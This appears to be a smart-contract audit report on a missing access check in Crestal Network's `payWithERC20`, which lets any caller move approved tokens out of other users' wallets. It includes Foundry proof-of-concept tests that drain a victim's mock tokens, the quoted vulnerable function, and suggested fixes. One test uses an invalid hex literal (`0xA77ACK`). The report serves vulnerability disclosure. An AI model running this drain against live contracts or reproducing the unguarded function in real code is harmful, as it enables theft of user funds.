Uneven Taupe Cougar

High

# Unauthorized Payment Processing via `Payment:: payWithERC20` allows anyone to drain funds from other users

### Summary

The [payWithERC20](https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/Payment.sol#L25C5-L32C6) function in the Payment.sol contract has no access control or signature verification, which will cause unauthorized token transfers as any external caller can attempt token transfers from any user's account, bypassing the gasless transaction security model.

### Root Cause

In Payment.sol, the payWithERC20 function is implemented as a public function without any access control mechanisms:

```solidity
// slither-disable-next-line arbitrary-send-erc20
function payWithERC20(address erc20TokenAddress, uint256 amount, address fromAddress, address toAddress) public {
    // check from and to address
    require(fromAddress != toAddress, "Cannot transfer to self address");
    require(toAddress != address(0), "Invalid to address");
    require(amount > 0, "Amount must be greater than 0");
    IERC20 token = IERC20(erc20TokenAddress);
    token.safeTransferFrom(fromAddress, toAddress, amount);
}
```
This function does not:

- Verify the caller is authorized to transfer tokens on behalf of fromAddress
- Include any signature validation for gasless transactions
- Restrict who can call the function

While the function will only succeed if the contract has an allowance from fromAddress, this design is inconsistent with the rest of the codebase which implements proper EIP-712 signature verification for other operations.



### Internal Pre-conditions

- A user has approved the contract to spend their tokens (has set an allowance)
- The contract is used for operations that involve token transfers

### External Pre-conditions

None

### Attack Path

- User approves the contract to spend their tokens for legitimate operations (like creating an agent)
- Attacker calls payWithERC20 directly, specifying:

    The token address
     An amount within the approved allowance
- The user's address as fromAddress
- Any address (including their own) as toAddress


Contract executes the transfer without verifying the caller is authorized
User's tokens are transferred to the attacker's address or any address the attacker specified

### Impact

The affected parties (primarily users who have approved token allowances) suffer from:

- Unauthorized token transfers within their approved allowance
- Bypass of the intended gasless transaction flow
- Loss of funds without proper authorization

This vulnerability is particularly concerning because:

- It undermines the entire authorization model of the contract
- It makes the EIP-712 signature verification in other functions irrelevant since payments can be processed without signatures
- Users who approve tokens for legitimate operations become vulnerable to unauthorized transfers

### PoC

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.26;

import {Test, console} from "forge-std/Test.sol";
import {Vm} from "forge-std/Vm.sol";
import {BlueprintV5} from "../src/BlueprintV5.sol";
import {BlueprintCore} from "../src/BlueprintCore.sol";
import {Blueprint} from "../src/Blueprint.sol";
import {MockERC20} from "./MockERC20.sol";

contract UnauthorizedPaymentPoCTest is Test {
    BlueprintV5 public blueprint;
    MockERC20 public mockToken;
    address public victim;
    address public attacker;
    address public feeCollector;
    
    function setUp() public {
        // Deploy contracts
        blueprint = new BlueprintV5();
        blueprint.initialize();
        mockToken = new MockERC20();
        
        // Setup fee collection wallet
        feeCollector = address(0x7D8be0Dd8915E3511fFDDABDD631812be824f578);
        blueprint.setFeeCollectionWalletAddress(feeCollector);
        
        // Setup victim account
        victim = vm.addr(0xB0B);
        
        // Setup attacker account
        attacker = vm.addr(0xA77ACK);
        
        // Configure payment token
        blueprint.addPaymentAddress(address(mockToken));
        
        // Give victim some tokens
        uint256 victimTokens = 100 * 10**18;
        mockToken.mint(victim, victimTokens);
        
        // Victim approves blueprint contract to spend tokens for legitimate purposes
        vm.prank(victim);
        mockToken.approve(address(blueprint), victimTokens);
        
        console.log("Victim approved blueprint to spend", victimTokens, "tokens");
    }
    
    function test_UnauthorizedPaymentAttack() public {
        // Log initial balances
        uint256 initialVictimBalance = mockToken.balanceOf(victim);
        uint256 initialAttackerBalance = mockToken.balanceOf(attacker);
        console.log("Initial victim balance:", initialVictimBalance);
        console.log("Initial attacker balance:", initialAttackerBalance);
        
        // Attacker directly calls payWithERC20 to steal tokens
        uint256 stealAmount = 50 * 10**18;
        console.log("Attacker attempts to steal", stealAmount, "tokens");
        
        // First attack: Steal tokens directly to attacker
        vm.prank(attacker);
        blueprint.payWithERC20(
            address(mockToken),
            stealAmount,
            victim,        // fromAddress - the victim
            attacker       // toAddress - the attacker
        );
        
        // Log intermediate balances
        uint256 midVictimBalance = mockToken.balanceOf(victim);
        uint256 midAttackerBalance = mockToken.balanceOf(attacker);
        console.log("Victim balance after direct theft:", midVictimBalance);
        console.log("Attacker balance after direct theft:", midAttackerBalance);
        
        // Verify attacker successfully stole tokens
        assertEq(initialVictimBalance - midVictimBalance, stealAmount, "Victim did not lose expected amount");
        assertEq(midAttackerBalance - initialAttackerBalance, stealAmount, "Attacker did not gain expected amount");
        
        // Second attack: Disguise theft as legitimate payment to fee collector
        uint256 remainingStealAmount = initialVictimBalance - midVictimBalance;
        console.log("Attacker attempts to disguise theft of remaining", remainingStealAmount, "tokens");
        
        uint256 initialFeeCollectorBalance = mockToken.balanceOf(feeCollector);
        
        vm.prank(attacker);
        blueprint.payWithERC20(
            address(mockToken),
            remainingStealAmount,
            victim,         // fromAddress - the victim
            feeCollector    // toAddress - the fee collector (looks legitimate)
        );
        
        // Log final balances
        uint256 finalVictimBalance = mockToken.balanceOf(victim);
        uint256 finalFeeCollectorBalance = mockToken.balanceOf(feeCollector);
        console.log("Final victim balance:", finalVictimBalance);
        console.log("Final fee collector balance:", finalFeeCollectorBalance);
        
        // Verify second attack succeeded
        assertEq(finalVictimBalance, 0, "Victim should have no tokens left");
        assertEq(finalFeeCollectorBalance - initialFeeCollectorBalance, remainingStealAmount, 
                "Fee collector balance should increase by the stolen amount");
        
        console.log("Attack verified: Attacker was able to transfer all", initialVictimBalance, 
                   "tokens from the victim without authorization");
    }
    
    function test_SystemManipulationAttack() public {
        // In this scenario, attacker manipulates the system by triggering unintended payments
        
        // Setup a project to simulate legitimate use
        bytes32 projectId = bytes32(0x2723a34e38d0f0aa09ce626f00aa23c0464b52c75516cf3203cc4c9afeaf2980);
        
        // Attacker first creates a legitimate project as themselves
        vm.prank(attacker);
        blueprint.createProjectID();
        
        console.log("Attacker created a legitimate project");
        
        // Log initial balances
        uint256 initialVictimBalance = mockToken.balanceOf(victim);
        console.log("Initial victim balance:", initialVictimBalance);
        
        // Attacker triggers payment from victim to fee collector to disrupt victim's plans
        uint256 disruptAmount = initialVictimBalance; // Take all tokens
        
        console.log("Attacker forces victim to pay", disruptAmount, "tokens to fee collector");
        
        vm.prank(attacker);
        blueprint.payWithERC20(
            address(mockToken),
            disruptAmount,
            victim,
            feeCollector
        );
        
        // Log final balances
        uint256 finalVictimBalance = mockToken.balanceOf(victim);
        console.log("Final victim balance:", finalVictimBalance);
        
        // Verify attacker disrupted the victim
        assertEq(finalVictimBalance, 0, "Victim should have no tokens left");
        
        // Now victim tries to create their own project but fails due to no tokens
        vm.prank(victim);
        bytes32 victimProjectId = blueprint.createProjectID();
        
        // Victim tries to create agent but fails due to no tokens
        vm.expectRevert("ERC20: transfer amount exceeds balance");
        vm.prank(victim);
        blueprint.createAgentWithToken(
            victimProjectId,
            "victim project proposal",
            address(0),
            "app.crestal.network",
            address(mockToken)
        );
        
        console.log("Attack verified: Attacker prevented victim from using the system by draining their tokens");
    }
}
```

### Mitigation

- Add Signature Verification

```solidity
function payWithERC20WithSig(
    address erc20TokenAddress, 
    uint256 amount, 
    address fromAddress, 
    address toAddress,
    uint256 deadline,
    bytes memory signature
) public {
    require(block.timestamp <= deadline, "Signature expired");
    
    // Get current nonce for signer
    uint256 currentNonce = getNonce(fromAddress);
    
    // Create digest with payment details
    bytes32 digest = getPaymentDigest(
        erc20TokenAddress, 
        amount, 
        fromAddress, 
        toAddress,
        currentNonce,
        deadline
    );
    
    // Verify signature
    address signerAddr = getSignerAddress(digest, signature);
    require(signerAddr == fromAddress, "Invalid signature");
    
    // Increment nonce
    incrementNonce(fromAddress);
    
    // Execute the transfer
    IERC20 token = IERC20(erc20TokenAddress);
    token.safeTransferFrom(fromAddress, toAddress, amount);
}
```

- Restrict Access to the Existing Function:
```solidity
function payWithERC20(address erc20TokenAddress, uint256 amount, address fromAddress, address toAddress) public {
    require(fromAddress != toAddress, "Cannot transfer to self address");
    require(toAddress != address(0), "Invalid to address");
    require(amount > 0, "Amount must be greater than 0");
    
    // Only allow fromAddress or authorized contracts to call
    require(msg.sender == fromAddress || authorizedCallers[msg.sender], "Unauthorized caller");
    
    IERC20 token = IERC20(erc20TokenAddress);
    token.safeTransferFrom(fromAddress, toAddress, amount);
}
```